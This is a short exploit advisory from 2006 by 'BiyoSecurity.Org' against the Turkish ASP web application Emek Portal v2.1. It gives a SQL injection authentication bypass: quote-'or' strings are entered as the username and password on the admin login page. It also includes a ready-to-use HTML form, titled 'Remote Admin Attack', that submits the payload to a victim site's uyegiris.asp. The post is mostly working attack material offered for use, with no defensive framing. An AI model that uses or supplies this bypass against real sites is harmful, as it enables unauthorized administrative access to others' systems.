Home / os / win10


Posted on 12 October 2006

# BiyoSecurity.Org # script name : Emek Portal v2.1 (tr) # Script Download : http://www.aspindir.com/indir.asp?id=2728 # Risk : High # Regards : Dj ReMix # Thanks : Korsan , Liz0zim , Tr_IP # Vulnerable file : giris_yap.asp Manual connect : Go to Admin Panel Login -----> http://victim.com/[path to script]/uyegiris.asp User name and pass : 'or' 'or"1=1' Remote connect : <title>Remote Admin Attack - BiyoSecurity.Org</title> <center> RMx - BiyoSecurtiy.Org</center> <FORM NAME=giris ACTION="http://victim.com/Path to script/uyegiris.asp" METHOD=post> <table align=center> <td>Kullanici Adi:</td><td><INPUT NAME=k_a class="input" value="'or'" SIZE=15></td> </tr><tr> <td>Sifre:</td><td><INPUT NAME=sifre TYPE=text class="input" value="'or'" SIZE=15></td> </tr><tr> <td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td> </tr></table></form> Bye =)



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